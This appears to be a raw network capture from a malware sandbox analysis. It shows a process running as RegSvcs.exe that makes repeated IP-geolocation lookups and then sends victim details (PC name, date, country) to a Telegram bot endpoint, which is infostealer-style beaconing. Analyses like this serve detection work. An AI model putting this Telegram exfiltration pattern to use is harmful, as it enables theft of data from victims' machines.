                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8JuQ2veUO4C2Z96unbc9PH1R%2FID6qyuCv4WlzboQ%2FxrgHZyNPZzmqAi%2Bq%2F3lZueOR3TSGTHPz8sE0LYYviVuoFmVgAUB46BxRN03DMGgvUR2ThZNg28lcX1exXl5dPr4%2BfLt6CV"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea07aa8790fa8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1474&rtt_var=571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1886304&cwnd=252&unsent_bytes=0&cid=4b43ef80ab3ced2f&ts=162&x=0"
                                                                                                                2025-01-10 18:10:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.649808104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:10:59 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:59 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847448
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CK9PFEhBaR4HN8zeMwSJ16pDQ8cmfjQ0nwb1y9i8EiQjHlQgASFl3FbylS%2F8wpORZfsCZ4Oz5s1WIUcKGvd%2BzkkpwaUwVKIScZ52FE818r769nHRxYoqNs%2B%2Fy40TWU6s2AhpEiTf"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0826ceb7293-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1884&rtt_var=716&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1519250&cwnd=158&unsent_bytes=0&cid=4f769fa0fdab0eef&ts=152&x=0"
                                                                                                                2025-01-10 18:10:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.649814149.154.167.2204436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:00 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:00 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 18:11:00 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 18:11:00 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.649826104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:02 UTC863INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:02 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847451
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=attMR2gorBmYN%2FKdIdKJp%2FF0dV3sJN%2BzkrC9Dj9MBZVxKNDs7Q%2FkoLPYJwlONEE015Mt0EeEQo8ilLtvjve8t%2BQSMxZcrzDJ2k3PGhYeBwP7A6txtOXmiu7jhK2zDWNnna%2B0%2FXNH"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0919e1141ba-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1741&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1619523&cwnd=192&unsent_bytes=0&cid=d6f80b5d12277388&ts=169&x=0"
                                                                                                                2025-01-10 18:11:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.649833104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:02 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:11:02 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:02 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847451
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6ZMHX6cEznJCGUvmbkQk%2FSh51HyLjGWVsV2%2FmujfqlSab2pPiaeFhYTs9UbelTiuml9whY9BIf5ONNYrTofyJJL3hGw0gjrW7S7UAk%2FYNJJSyVD%2Ffd%2F3cBpQuu9w3LUlf%2BvqLUL"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea096ac361899-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1691&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1726788&cwnd=153&unsent_bytes=0&cid=c57e4acf96b83bfb&ts=161&x=0"
                                                                                                                2025-01-10 18:11:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.649844104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:03 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:11:04 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:04 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847453
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UEPc%2FZbZizGN3s19NeHnypkC6k6YJnjPvOEzlicGv%2F352UiSgFiGVbpPCU8PbzQzBClnQ9kiC4fLoyOVa1dcjwrPt301oYl0ugW28pjo%2BSDCFDTfSUW57IPQJtEC6UJrJkXr7Bs2"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea09e7c6f4388-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1775075&cwnd=221&unsent_bytes=0&cid=e36165d0412a22c4&ts=135&x=0"
                                                                                                                2025-01-10 18:11:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.649853104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:05 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:05 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847454
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qg8jQ8eQh3BJHcKTsJulIQxcsQHshOGgVXM7J0j7ens98sHJN4hLvTo%2Fa9GDGnu4CeLRngRGheYOnWl4byqHyRikfyJt7NNWN0RBXoOkKb%2BCnLEhzc%2FIaZj2wUZc9FUSP%2BbL4Nw"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0a66f0e4388-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1563&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1868202&cwnd=221&unsent_bytes=0&cid=f41b8ed3a7657cd6&ts=161&x=0"
                                                                                                                2025-01-10 18:11:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.649864104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:06 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:06 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847455
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKV8Y7jl4XU8Ccb8LakSGg7Qpfq0vlGljpa4iVZhF9YkplSNiTxVyjb1w10nTGP6NNtzsHItBkzP5baiuU5vDuwm3zkb34XAH5t0tuonBxeLLDKpQtiDDNGFU3bq4ncAF%2B06zMAw"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0ae68ed4388-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1533&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1789215&cwnd=221&unsent_bytes=0&cid=e85aa6d5ddad818b&ts=155&x=0"
                                                                                                                2025-01-10 18:11:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.649876104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:11:07 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:07 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847457
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAIlFFXlH6xhZ3IiR2Go0X5MvBL4WrmtOa1UW4eqFxysnP7VoMCBJ4w0GdNe5Dh%2B3kpto9Ul84PWpObzTo%2BYwRJK43TwtIcx%2BQQLp2rJ5dUKSBUwulB2lQNrtsxTP6HmL7VXSZiF"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0b629c08ce3-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1584373&cwnd=252&unsent_bytes=0&cid=f2d7571ba8f08a3f&ts=152&x=0"
                                                                                                                2025-01-10 18:11:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.649885104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:09 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:09 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847458
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2b8y0EMsK5sTmbecLrvC%2BJm%2B%2F82phrj6mECNns5Hl2RWM2UeaBiiJCbWh3pmXpRIkoizgSK%2BdomacaK%2FzTs74BIRtQPIYDIgYc4AnZXLPrjgwguGyk0XAXiqOaj6ek42ZdGzav%2Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0be48b37293-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1947&rtt_var=735&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1484494&cwnd=158&unsent_bytes=0&cid=96bed7eab2edf65d&ts=151&x=0"
